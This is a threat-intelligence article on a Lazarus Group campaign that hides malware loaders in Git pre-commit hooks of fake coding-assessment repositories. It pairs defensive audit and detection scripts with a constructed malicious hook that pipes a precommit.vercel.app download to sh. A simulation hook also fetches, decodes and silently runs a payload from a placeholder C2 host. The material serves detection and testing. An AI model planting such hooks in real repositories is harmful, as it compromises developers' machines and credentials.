SOC Prime Bias: Critical

13 May 2026 21:59

Lazarus Group Uses Git Hooks To Hide Malware

DPRK’s Contagious Interview and TaskJacker campaign is now hiding its second‑stage loader inside Git hooks that download InvisibleFerret and BeaverTail malware

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The North Korean Lazarus Group has updated its Contagious Interview and TaskJacker campaign by embedding a second-stage delivery mechanism inside malicious Git pre-commit and post-checkout hooks. When triggered, the hooks silently retrieve a platform-specific payload from a Vercel-hosted URL and execute it on macOS, Linux, or Windows. By abusing trusted developer workflows and repository tooling, the attackers turn a routine coding task into a supply-chain compromise vector that leads to credential theft and cryptocurrency wallet compromise. Key indicators are the malicious .githooks/pre-commit script and the infrastructure hosted at precommit.vercel.app.

Investigation

OpenSourceMalware researchers identified a compact .githooks/pre-commit script that detects the victim’s operating system and downloads the matching payload from precommit.vercel.app using curl or wget. The same script hash appeared across multiple GitHub repositories posing as coding-assessment projects with crypto and DeFi themes. The server returned a different shell or batch payload per operating system, selected by a flag query parameter (the URLs in the attack flow below all carry flag=5). The researchers also published GitHub code search queries that reproduce the hunt and surface similar repositories.

Mitigation

Organizations should review Git repository hooks carefully, especially files under .githooks, .husky, and .vscode/tasks.json, before allowing them to run. Note that git clone never copies hooks into .git/hooks: a script under .githooks only executes once something points core.hooksPath at that directory, so the setup steps a repository asks for (package scripts, Makefiles, README instructions) deserve the same scrutiny as the hook itself. Developers should clone and test untrusted repositories only in isolated environments that contain no SSH keys, wallet files, or active browser profiles. Automatic execution of Git hooks should be disabled where possible or limited to approved scripts. Security teams should also monitor outbound traffic to precommit.vercel.app and similar domains that may serve payloads.
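The pre-clone review described in the Investigation and Mitigation sections, as an added example (this is not code from the OpenSourceMalware report or from SOC Prime’s detection content): it enumerates every place a hook can live or be wired up in a checked-out repository, flags fetch-and-run patterns, and reports a hook even when it looks benign so the reviewer knows it exists. The sample repository, its hook text and its package.json are constructed for the demo; the prepare-script that sets core.hooksPath is an assumption about one way a .githooks directory could be activated, not something the report states.

```python
"""Audit a cloned repository for Git hook and task files before running anything.

Added example for this article, not the report's or SOC Prime's code. It looks in
the hook directories named in the Mitigation section, plus the files that commonly
wire core.hooksPath, and flags the behaviours the report describes: OS detection,
curl/wget fetches, piping to a shell, base64 decoding, vercel.app hosts.
"""
import re
import tempfile
from pathlib import Path

HOOK_DIRS = (".githooks", ".husky", ".git/hooks")
# Files that can configure or launch hooks (e.g. a prepare script setting core.hooksPath).
WIRING_FILES = (".vscode/tasks.json", "package.json", "Makefile", "setup.sh")

# (finding name, pattern) pairs a reviewer should stop on.
RISKY = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b")),
    ("fetch-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b")),
    ("decode-payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("os-detection", re.compile(r"\buname\b|\$OSTYPE\b|\bOS=")),
    ("vercel-host", re.compile(r"https?://[\w.-]*vercel\.app", re.I)),
    ("hookspath-wiring", re.compile(r"core\.hooksPath", re.I)),
]


def scan_text(text: str) -> list[str]:
    """Return the names of the risky patterns present in one file's content."""
    return [name for name, rx in RISKY if rx.search(text)]


def audit_repo(repo: Path) -> dict[str, list[str]]:
    """Map each hook or wiring file (relative path) to its findings.

    Git's own *.sample hooks from `git init` are skipped; every other hook is
    listed, with an empty list when nothing risky matched.
    """
    candidates: list[Path] = []
    for d in HOOK_DIRS:
        p = repo / d
        if p.is_dir():
            candidates += [f for f in p.rglob("*")
                           if f.is_file() and not f.name.endswith(".sample")]
    for f in WIRING_FILES:
        p = repo / f
        if p.is_file():
            candidates.append(p)
    return {str(f.relative_to(repo)): scan_text(f.read_text(errors="replace"))
            for f in candidates}


# Constructed fixture: hook text mirroring the behaviour described in the report.
SAMPLE_HOOK = """#!/bin/sh
case "$(uname -s)" in
  Darwin) P=mac ;;
  Linux)  P=linux ;;
  *)      P=windows ;;
esac
URL="https://precommit.vercel.app/settings/$P?flag=5"
(curl -fsSL "$URL" || wget -qO- "$URL") | sh >/dev/null 2>&1 &
exit 0
"""

# Constructed fixture: an ASSUMED way the hook directory gets activated.
SAMPLE_PACKAGE_JSON = """{
  "name": "defi-assessment",
  "scripts": { "prepare": "git config core.hooksPath .githooks", "test": "jest" }
}
"""


def build_sample_repo() -> Path:
    """Create a throwaway directory laid out like the repositories described above."""
    repo = Path(tempfile.mkdtemp(prefix="hookaudit-"))
    (repo / ".githooks").mkdir()
    (repo / ".githooks" / "pre-commit").write_text(SAMPLE_HOOK)
    (repo / "package.json").write_text(SAMPLE_PACKAGE_JSON)
    (repo / "README.md").write_text("# Coding assessment\n")
    return repo


if __name__ == "__main__":
    for path, hits in audit_repo(build_sample_repo()).items():
        status = "REVIEW" if hits else "present"
        print(f"{status:8} {path}: {', '.join(hits) or 'no risky pattern'}")
```

Run it against a freshly cloned repository as `audit_repo(Path("path/to/clone"))` before executing any setup step; after the setup step, confirm with `git config --get core.hooksPath` that nothing has been pointed at the hook directory without your knowledge.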

Response

Defenders should block network communication with precommit.vercel.app and add file integrity monitoring for unexpected .githooks/pre-commit files. Alerts should fire when curl or wget is executed from a Git hook process chain. Any credentials, tokens, or cryptocurrency wallets that may have been exposed should be investigated and rotated immediately. Threat hunting should be expanded with the published indicators to identify affected repositories and any systems that interacted with them.
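The alerting rule from the Response section, as an added example (not SOC Prime’s detection content, which the page does not reproduce): over process-start telemetry it flags any curl or wget whose ancestry contains a Git hook script, and raises the severity when the fetched host is the published indicator precommit.vercel.app. The event records are constructed for the demo in a generic EDR shape (pid, ppid, image, cmdline); map the field names to your own source.

```python
"""Flag curl/wget launched from a Git hook, using process-creation telemetry.

Added example for this article, not SOC Prime's or the report's code. Logic:
walk each fetcher's parent chain; if a hook script (.githooks/, .husky/ or
.git/hooks/) is in it, alert. Known indicator host => critical, otherwise high,
because a hook downloading anything deserves a look even when the host is new.
"""
import re
from urllib.parse import urlparse

IOC_HOSTS = {"precommit.vercel.app"}   # indicator published for this campaign
FETCHERS = {"curl", "wget"}
HOOK_PATH = re.compile(
    r"(^|[\s/])(\.githooks|\.husky|hooks)/"
    r"(pre-commit|post-checkout|post-merge|prepare-commit-msg|commit-msg|pre-push)\b"
)


def image_name(image: str) -> str:
    """Basename of the executable path."""
    return image.rsplit("/", 1)[-1]


def hosts_in(cmdline: str) -> set[str]:
    """Hostnames of every URL token in a command line (quotes stripped)."""
    hosts = set()
    for tok in cmdline.split():
        tok = tok.strip("\"'")
        if tok.startswith(("http://", "https://")):
            host = urlparse(tok).hostname
            if host:
                hosts.add(host)
    return hosts


def ancestors(pid: int, by_pid: dict) -> list[dict]:
    """Parent, grandparent, ... until the chain leaves the event set or loops."""
    chain, seen, ev = [], set(), by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        chain.append(ev)
    return chain


def detect(events: list[dict]) -> list[tuple[int, str, str]]:
    """Return (pid, severity, reason) for each fetcher running under a Git hook."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) not in FETCHERS:
            continue
        chain = ancestors(e["pid"], by_pid)
        hook = next((a for a in chain if HOOK_PATH.search(a["cmdline"])), None)
        if hook is None:
            continue
        hosts = hosts_in(e["cmdline"])
        under_git = any(image_name(a["image"]) == "git" for a in chain)
        sev = "critical" if hosts & IOC_HOSTS else "high"
        reason = (f"{image_name(e['image'])} spawned by hook {hook['cmdline'].split()[-1]}"
                  f"{' under git' if under_git else ''} -> {','.join(sorted(hosts)) or 'no URL'}")
        findings.append((e["pid"], sev, reason))
    return findings


# Constructed sample telemetry (not real captures). One malicious chain hitting the
# indicator host, one hand-run curl (benign), one husky hook fetching an unknown host.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "/usr/bin/bash", "cmdline": "bash"},
    {"pid": 101, "ppid": 100, "image": "/usr/bin/git",  "cmdline": "git commit -m 'solve task 3'"},
    {"pid": 102, "ppid": 101, "image": "/bin/sh",       "cmdline": "/bin/sh .githooks/pre-commit"},
    {"pid": 103, "ppid": 102, "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://precommit.vercel.app/settings/linux?flag=5"},
    {"pid": 200, "ppid": 100, "image": "/usr/bin/curl", "cmdline": "curl -sI https://example.com"},
    {"pid": 300, "ppid": 100, "image": "/usr/bin/git",  "cmdline": "git commit -m 'wip'"},
    {"pid": 301, "ppid": 300, "image": "/bin/sh",       "cmdline": "/bin/sh -e .husky/pre-commit"},
    {"pid": 302, "ppid": 301, "image": "/usr/bin/wget", "cmdline": "wget -qO- https://cdn.example.net/setup.sh"},
]

if __name__ == "__main__":
    for pid, sev, reason in detect(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] pid {pid}: {reason}")
```

The hook-path test deliberately does not require git to be the direct parent: Git execs the hook script itself, so the fetcher is usually a grandchild of git via the hook’s interpreter, and the chain can be longer when the hook calls a wrapper. If the rule is noisy in your environment, require `under_git` as well before alerting at high severity.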

Attack Flow

    graph TB
        %% Class definitions
        classDef technique fill:#ffcc99
        classDef tool fill:#c2e0ff
        classDef artifact fill:#e6e6e6
        classDef action fill:#ffd9b3

        %% Nodes – Actions
        action_clone["<b>Action</b> – Victim clones malicious repository<br/><b>Description</b>: Downloads code containing a malicious Git hook."]
        class action_clone action
        action_commit["<b>Action</b> – Victim runs <code>git commit</code><br/><b>Description</b>: Triggers the pre-commit hook automatically."]
        class action_commit action

        %% Nodes – Artifacts
        artifact_repo["<b>Artifact</b> – Malicious Git repository<br/><b>Details</b>: Provides fake coding-assessment interview material."]
        class artifact_repo artifact
        artifact_hook["<b>Artifact</b> – .githooks/pre-commit script<br/><b>Details</b>: Executed automatically on each <code>git commit</code>."]
        class artifact_hook artifact
        artifact_urls["<b>Artifact</b> – Remote payload URLs<br/><b>Details</b>: https://precommit.vercel.app/settings/mac?flag=5<br/>https://precommit.vercel.app/settings/linux?flag=5<br/>https://precommit.vercel.app/settings/windows?flag=5"]
        class artifact_urls artifact

        %% Nodes – Techniques
        tech_supply_chain["<b>Technique</b> – T1195: Supply Chain Compromise<br/><b>Description</b>: Adversaries compromise a third-party software supply chain to distribute malicious code to victims."]
        class tech_supply_chain technique
        tech_dependency["<b>Technique</b> – T1195.001: Compromise Software Dependencies and Development Tools<br/><b>Description</b>: Target software dependencies or development tools to embed malicious code."]
        class tech_dependency technique
        tech_proxy_exec["<b>Technique</b> – T1127: Trusted Developer Utilities Proxy Execution<br/><b>Description</b>: Use trusted developer utilities (e.g., Git hooks) to execute attacker-controlled code."]
        class tech_proxy_exec technique
        tech_unix_shell["<b>Technique</b> – T1059.004: Command and Scripting Interpreter – Unix Shell<br/><b>Description</b>: Execute commands via a Unix shell interpreter."]
        class tech_unix_shell technique
        tech_user_exec["<b>Technique</b> – T1204.004: User Execution – Malicious Copy and Paste<br/><b>Description</b>: Victim runs malicious code unintentionally through copy-and-paste actions."]
        class tech_user_exec technique
        tech_taint["<b>Technique</b> – T1080: Taint Shared Content<br/><b>Description</b>: Embed malicious content in shared resources that are later executed by victims."]
        class tech_taint technique
        tech_content_injection["<b>Technique</b> – T1659: Content Injection<br/><b>Description</b>: Insert malicious content into legitimate files or data streams."]
        class tech_content_injection technique

        %% Nodes – Tools
        tool_git["<b>Tool</b> – Git<br/><b>Description</b>: Version-control system that runs hook scripts on repository events."]
        class tool_git tool
        tool_curl["<b>Tool</b> – curl / wget<br/><b>Description</b>: Downloads remote content over HTTP/HTTPS."]
        class tool_curl tool
        tool_sh["<b>Tool</b> – /bin/sh<br/><b>Description</b>: Shell interpreter used to run downloaded payloads."]
        class tool_sh tool

        %% Connections – Attack Flow
        action_clone -->|delivers| artifact_repo
        artifact_repo -->|enables| tech_supply_chain
        tech_supply_chain -->|facilitates| tech_dependency
        tech_dependency -->|places| artifact_hook
        action_commit -->|triggers| artifact_hook
        artifact_hook -->|leverages| tech_proxy_exec
        tech_proxy_exec -->|executes via| tool_git
        tool_git -->|invokes| tech_unix_shell
        tech_unix_shell -->|uses| tool_curl
        tool_curl -->|downloads| artifact_urls
        artifact_urls -->|supplies to| tech_taint
        tech_taint -->|leads to| tech_content_injection
        tech_content_injection -->|executes via| tool_sh
        tool_sh -->|runs malicious payload| tech_user_exec

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An operator from the Lazarus Group delivers a malicious Git pre‑commit hook to a developer’s workstation (in the real campaign through a cloned coding-assessment repository; this simulation writes it locally). The hook sits in a .githooks directory, where it is easy to overlook. When the developer runs git commit, Git executes the hook, which silently contacts a C2 server, downloads a base64‑encoded payload, writes it to /tmp/.payload, marks it executable and runs it in the background: attacker-controlled code executed through a trusted developer utility (T1127) and a Unix shell (T1059.004), matching the attack flow above.

  • Regression Test Script:

    #!/bin/bash
    # -------------------------------------------------
    # Lazarus‑style malicious Git pre‑commit hook test
    # -------------------------------------------------
    set -u

    # 1. Create the .githooks directory the hook will live in
    mkdir -p "$HOME/.githooks"

    # 2. Write the malicious pre‑commit hook. The C2 host is a placeholder:
    #    the download is expected to fail in a lab, which is fine, because
    #    the curl execution from the hook is the telemetry under test.
    cat > "$HOME/.githooks/pre-commit" <<'EOF'
    #!/bin/bash
    # Malicious pre‑commit hook – downloads and executes payload
    C2_URL="http://malicious.example.com/payload.b64"
    TMPFILE="/tmp/.payload"

    # Download base64 payload; on failure stay silent and let the commit proceed
    curl -fs -o "$TMPFILE.b64" "$C2_URL" || exit 0
    # Decode and set executable
    base64 -d "$TMPFILE.b64" > "$TMPFILE" 2>/dev/null
    chmod +x "$TMPFILE"
    # Execute payload silently in the background
    "$TMPFILE" >/dev/null 2>&1 &
    exit 0
    EOF

    # 3. Make the hook executable
    chmod +x "$HOME/.githooks/pre-commit"

    # 4. Create a repository and point core.hooksPath at the hook directory.
    #    Git only runs hooks from .git/hooks or from core.hooksPath; without
    #    this step the hook never fires and the test passes for the wrong reason.
    mkdir -p "$HOME/malicious-repo"
    cd "$HOME/malicious-repo"
    git init > /dev/null 2>&1
    git config core.hooksPath "$HOME/.githooks"
    git config user.name "hook-test"
    git config user.email "hook-test@example.com"

    # 5. Commit to fire the hook
    touch README.md
    git add README.md
    git commit -m "Initial commit" > /dev/null 2>&1

    echo "Malicious pre‑commit hook executed (if detection works, an alert should appear)."
  • Cleanup Commands:

    #!/bin/bash
    # Remove malicious artifacts
    rm -rf "$HOME/.githooks"
    rm -f "/tmp/.payload" "/tmp/.payload.b64"
    rm -rf "$HOME/malicious-repo"
    echo "Cleanup complete."